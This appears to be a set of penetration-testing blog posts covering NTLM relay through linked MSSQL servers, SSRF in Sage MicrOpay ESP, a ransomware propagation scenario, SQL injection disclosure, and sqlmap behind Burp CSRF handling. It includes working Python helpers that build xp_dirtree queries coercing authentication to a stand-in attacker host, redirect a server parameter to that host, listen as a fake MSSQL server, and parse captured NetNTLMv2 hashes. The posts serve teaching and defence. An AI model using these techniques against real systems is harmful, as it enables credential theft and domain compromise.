NTLM Relay Backflips

A little while back we were conducting an application security test for a client, when we managed a fun little backflip with NTLM credential relaying that we felt was worth sharing.

The application was at first glance quite unremarkable. A fairly typical Windows thick client, an application server, and a back-end MSSQL database server. As it usually does, the fun started with one of those ‘huh, that’s interesting’ moments. Looking at some XML configuration files in the thick client’s directory we found a handful of base64 encoded values with names like ‘DBUsername’ and ‘DBPassword’, next to some plain-text host names and port numbers. Attempting to decode the base64 resulted in illegible binary garbage, so they were obviously encrypted. It seems likely that the application developers assumed that an attacker would give up at this point, but we are nothing if not stubborn, and our thinking was that if the client software was able to decrypt these credentials, and we had a copy of the client, we MUST be able to decrypt them as well.

Initially we braced ourselves for a tedious reverse-engineering process, but were quickly relieved to find that the relevant binaries were all managed .NET, meaning we were able to simply decompile them back to extremely legible source code. Grepping the source for the string ‘crypt’ very quickly identified the function responsible for the encryption and decryption of our stored database credentials, along with a hard-coded key and IV, both of which were based very closely on the name of the software vendor.

After some short work in Python reimplementing the decryption function from the application, we were the proud owners of some shiny new database credentials – but what could we do with them? Logging into the MS SQL Server instance we found that even though this WAS the same server used by the application for its main database, our credentials could only access a smaller, less interesting database on the same server. The client retrieved its most sensitive data using a more traditional approach, i.e. via an application-layer server with its own back-end connection to the database.
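In outline, the recovery step looked something like this – a minimal Python sketch with illustrative element names and values, and with the decryption routine itself omitted (it was a direct reimplementation of the decompiled .NET code):

```python
import base64
import xml.etree.ElementTree as ET

# Illustrative config snippet; the real file used similar element names.
CONFIG = """
<configuration>
  <add key="DBServer" value="sql01.internal" />
  <add key="DBUsername" value="c2VjcmV0dXNlcg==" />
  <add key="DBPassword" value="aHVudGVyMg==" />
</configuration>
"""

def extract_encoded_creds(xml_text):
    """Pull the base64-encoded credential values out of the config."""
    root = ET.fromstring(xml_text)
    values = {e.get("key"): e.get("value") for e in root.iter("add")}
    return {k: base64.b64decode(values[k]) for k in ("DBUsername", "DBPassword")}

creds = extract_encoded_creds(CONFIG)
# In the real app these decoded bytes were ciphertext; decrypting them was a
# straight reimplementation of the decompiled routine (a block cipher with a
# hard-coded key and IV derived from the vendor's name), omitted here.
print(creds)
```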

‘xp_cmdshell’, that eternal hacker favourite, was not available to our user. If we wanted to find a way to pop the database server itself we were going to need to get at least a little bit creative.

Next we tried another classic trick using a different extended stored procedure, ‘xp_dirtree’. xp_dirtree essentially asks the SQL Server instance to provide a directory listing of a given file path. By providing a UNC path directing the server to an attacker-controlled host, one can usually use tools like Responder or ntlmrelayx to capture a NetNTLMv2 hash of the SQL Server service account password, or relay the service account’s credentials and use them to authenticate via SMB to a secondary host. While we were able to capture a hash, the password configured was strong enough to resist our cracking efforts in the time we had available. Further, we were unable to relay the credential via SMB to any of the in-scope hosts, as all had been configured with SMB signing set to the dreaded ‘REQUIRED’, making our relayed credentials worthless.
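For those who haven’t used the trick before, the probe is a one-line query. A small sketch of how we build it (the attacker hostname is obviously illustrative):

```python
def build_dirtree_probe(attacker_host, share="x"):
    """Build the T-SQL that coerces SQL Server into authenticating to us.

    When SQL Server tries to list the UNC path, its service account
    performs NTLM authentication against attacker_host, where Responder
    or ntlmrelayx is waiting.
    """
    unc = "\\\\{}\\{}".format(attacker_host, share)
    return "EXEC master..xp_dirtree '{}';".format(unc)

query = build_dirtree_probe("attacker.example.net")
print(query)  # EXEC master..xp_dirtree '\\attacker.example.net\x';
```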

Foiled.

But wait! NTLM authentication can be relayed to authenticate for many other protocols, including HTTP and MSSQL! Maybe the usual rules against reflecting NTLM authentication back to the source host wouldn’t apply in a cross-protocol scenario like this? Nope, they still apply.

Foiled again.

At this point we became a little frustrated and went back to basics, digging a little deeper into some earlier reconnaissance data we had acquired, including some gathered using Scott Sutherland’s (@_nullbind on Twitter) amazingly useful PowerUpSQL PowerShell module. PowerUpSQL will enumerate (among many other things) the links between one database server and another. These links are especially common in scenarios where you have a primary ‘operational’ database server and a secondary server acting as a ‘data warehouse’, with data regularly migrated from one database and archived in the other – which is exactly the scenario it identified for us in this case.

Sending queries via the first database to the data warehouse did not immediately yield any particularly useful results. We were similarly low-privileged in the data warehouse, and it was beginning to look like something of a dead end, when we suddenly realised that we already had everything we needed to own the whole box and dice.

First we set up ntlmrelayx to catch SMB authentication attempts against our attacker-controlled host and relay them on to the same MS SQL Server port as before – only this time, instead of running xp_dirtree on the first server, we used the database link to send the same xp_dirtree query to the second server. The second server attempted to connect to our host, which negotiated NTLM authentication and then relayed the authentication attempt back around to the first server’s MS SQL Server port, essentially completing a full loop.
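The only change from the earlier probe is wrapping it in an EXEC … AT so it executes across the database link – something like this sketch, with hypothetical server names, and with the quote-doubling that T-SQL requires inside EXEC():

```python
def build_linked_probe(linked_server, attacker_host):
    """Send the same xp_dirtree coercion via the database link, so the
    SECOND server's service account is the one that authenticates to us.

    Single quotes inside the EXEC('...') string must be doubled, which
    is why the inner query uses '' around the UNC path.
    """
    inner = "EXEC master..xp_dirtree ''\\\\{}\\x'';".format(attacker_host)
    return "EXEC ('{}') AT [{}];".format(inner, linked_server)

query = build_linked_probe("WAREHOUSE", "attacker.example.net")
print(query)
```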

We were back where we started, but now we were authenticated as the SQL Server service account, which had local Administrator privileges on both SQL servers, and thus was granted full ‘sa’ privileges on them as well. With admin access in hand we were able to enable the ‘xp_cmdshell’ extended stored procedure and use it to execute shell commands in the underlying OS as a full admin user. We won’t go into full detail here but after this breakthrough it was a matter of mere minutes before we were able to gain full control of the entire AD/Windows environment.

So, what are the take-home lessons from all of this?

Don’t hard-code credentials and encryption keys into your application configs or binaries. If your security design relies on doing this, you’ve designed it wrong.

Don’t let users log directly into the database server – make them go via an application layer server.

Disable SQL Server extended stored procedures that aren’t needed, including xp_cmdshell, xp_dirtree, and xp_fileexist.

Outbound firewall rules matter almost as much as inbound. If your backend servers don’t need to speak SMB to the client, don’t let them!

… and while SMB signing is an extremely underrated and effective security control, no single security control is ever completely effective in the face of a determined adversary.

Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include .pl, .sh, .exe, and in this instance, .dll.


Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do, I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.
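The tampering itself is trivial – a sketch of the parameter rewrite using Python’s standard library (the URL and hostnames here are placeholders, not the real target’s):

```python
from urllib.parse import urlsplit, parse_qs, urlencode, urlunsplit

def point_at_us(url, attacker_host):
    """Rewrite the CommonServer parameter so the application resolves
    (and tries to connect to) our host instead of its real database."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)
    params["CommonServer"] = [attacker_host]
    query = urlencode(params, doseq=True)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))

original = ("https://esp.example.com/ESP/iwContentGen.dll/start"
            "?InitialPage=100&NOLOGIN=Y&CommonServer=REAL-SQL02")
print(point_at_us(original, "canary.attacker.example.net"))
```

Watching the DNS query logs for a lookup of the canary hostname confirms the server-side resolution.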

At the very least we had some kind of server-side request forgery in play. The obvious next step was to see what else we could get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.
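Our listener was plain netcat, but the equivalent in a few lines of Python looks like this – a sketch that accepts one connection and logs the opening bytes (a genuine MSSQL client leads with a TDS pre-login packet, whose first byte is 0x12):

```python
import socket
import threading  # handy if you want to run the listener in the background

def fake_mssql_listener(host="0.0.0.0", port=1433, log=print):
    """Accept one inbound connection and log the client's first bytes.

    Seeing a TDS pre-login packet (first byte 0x12) confirms the app is
    genuinely trying to speak MSSQL to whatever we put in CommonServer.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    conn, peer = srv.accept()
    data = conn.recv(4096)
    log("connection from %s:%d, first bytes: %r" % (peer[0], peer[1], data[:16]))
    conn.close()
    srv.close()
    return data

# e.g. fake_mssql_listener(port=1433)  # blocks until the app connects
```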

So we have a web application on the inside… and it thinks I’m its database server…


I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on a UNC-style format that made my Responder go off like crazy.


For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password. But notice that ‘$’ at the end of where I’ve redacted the username? It means the account being used to authenticate is the AD computer account of the actual server itself – and that means the password is randomly generated and LOOOONG.
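Responder writes NetNTLMv2 captures in a colon-separated format (user::domain:challenge:NT-proof:blob), and that ‘$’ check is exactly how you spot a machine account. A quick sketch, with entirely synthetic values:

```python
def parse_netntlmv2(capture_line):
    """Split a Responder-style NetNTLMv2 capture into its fields:
    user::domain:server_challenge:NT_proof:blob"""
    user, rest = capture_line.split("::", 1)
    domain, challenge, proof, blob = rest.split(":", 3)
    return {
        "user": user,
        "domain": domain,
        # A trailing '$' marks an AD computer account, whose password is
        # machine-generated and effectively uncrackable.
        "is_machine_account": user.endswith("$"),
        "challenge": challenge,
        "nt_proof": proof,
        "blob": blob,
    }

# Synthetic example in the NetNTLMv2 capture format (values are made up):
sample = "WEBSRV01$::CORP:1122334455667788:" + "a" * 32 + ":0101000000000000"
print(parse_netntlmv2(sample)["is_machine_account"])  # True
```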

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed through the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.


The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

Neither DeathStar nor BloodHound relies on exploiting any actual software vulnerabilities. Rather, DeathStar leverages Active Directory configuration and the allocation of privilege to find and exploit a path through domain-joined systems that can be travelled, one hop at a time, to eventually obtain DA privileges. The BloodHound github page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”
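The graph idea is easy to sketch: treat users and machines as nodes, ‘admin-of’ and ‘has-session-on’ relationships as edges, and breadth-first search for a path to Domain Admins. A toy Python version over a made-up edge list:

```python
from collections import deque

# Hypothetical AD relationships, flattened into directed edges.
EDGES = {
    "user:alice": ["machine:WKSTN01"],       # alice has admin on her workstation
    "machine:WKSTN01": ["user:helpdesk1"],   # helpdesk1 has a session there
    "user:helpdesk1": ["machine:FILESRV"],   # helpdesk1 has admin on the file server
    "machine:FILESRV": ["user:da_bob"],      # a DA has a session on it
    "user:da_bob": ["group:DOMAIN_ADMINS"],
}

def attack_path(start, goal="group:DOMAIN_ADMINS"):
    """Breadth-first search for the shortest chain of hops to DA."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in EDGES.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None  # no path: these derivative-admin chains have been cut

print(attack_path("user:alice"))
```

If `attack_path` comes back `None` for your low-privileged users, the automated tooling (and the hypothesised malware) has nothing to walk.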

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password-spraying attack against Remote Desktop Services or Citrix (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like BloodHound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Vulnerability Disclosure: SQL Injection in Flash Page Flip

During an engagement for one of our clients we came across Flash Page Flip and found that it is vulnerable to SQL Injection. As per our responsible disclosure policy, the creators of Flash Page Flip were contacted to advise them of the issue.

90 days have passed since our initial communication, and we have received no further response. SQL injection is not a new topic – it is a 20th-century bug which is supposed to be long gone. The reason we decided to pursue this vulnerability officially (CVE-2015-1556 and CVE-2015-1557) is the apparently widespread use of this application.


A lack of input validation was evident across the majority of Flash Page Flip’s code, affecting multiple pages such as:

  • NewMember.php
  • GetUserData.php
  • SaveUserData.php
  • DeleteUserData.php
  • /xml/Pages.php

In other instances, only weak input sanitisation was applied before the SQL query was sent to the back-end database. Some of the affected pages are listed below:

  • /admin/EditSubCat.php
  • /admin/ViewPage.php
  • /admin/AddMag.php
  • /admin/AddCat.php
  • /admin/EditCat.php

Exploitation of this vulnerability could allow attackers to extract the data used by Flash Page Flip, which on its own may not be particularly sensitive. However, Flash Page Flip can also be used as a plugin to other CMS platforms and may therefore share their database, as happened during our engagement. In that case, SQL injection may expose more sensitive CMS data, including credentials.
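The underlying fix is the same as it has always been: parameterised queries. A minimal Python/sqlite3 illustration of the difference (the table and payload are contrived, not taken from Flash Page Flip):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

def lookup_unsafe(name):
    # String concatenation: the classic mistake behind this class of bug.
    return db.execute("SELECT secret FROM users WHERE name = '%s'" % name).fetchall()

def lookup_safe(name):
    # Parameterised query: the input can never break out of the value.
    return db.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
print(lookup_unsafe(payload))  # dumps every secret
print(lookup_safe(payload))    # returns nothing
```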

The full advisory can be found here.

Communication timeline:

  • 27th Jan 2015 – Contacted vendor with initial disclosure
  • 10th Feb 2015 – Contacted vendor with CVE identifiers
  • 29th Apr 2015 – Vulnerability published

Fuzzing and Sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthrough for setting up a Session Handling Rule and macro in Burp Suite for use with Burp’s Intruder. In this part, I will walk through a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to login to the application, and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.


There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.



In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies are irrelevant, since Burp will replace these based on the macro.
If it were a POST, you would need to include a similar --data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).
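Putting that together, the invocation looks roughly like this – a sketch with placeholder URL and cookie values (the “*” marks the injection point, and --batch just suppresses sqlmap’s interactive prompts):

```python
def sqlmap_argv(url_with_marker, cookies, burp="http://127.0.0.1:8080"):
    """Assemble the sqlmap invocation. The '*' in the URL marks the
    injection point; the cookie values are throwaway, because Burp's
    session handling rule rewrites them on the way through the proxy."""
    return [
        "sqlmap",
        "-u", url_with_marker,
        "--cookie", cookies,
        "--proxy", burp,
        "--batch",
    ]

argv = sqlmap_argv("https://target.example.com/api/items/1*", "JSESSIONID=whatever")
print(" ".join(argv))
# Pass argv to subprocess.run(argv) to launch sqlmap through Burp.
```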

Running sqlmap, we start to see it doing its thing in the Burp Proxy window.


That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.


Conclusion

In this two-part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).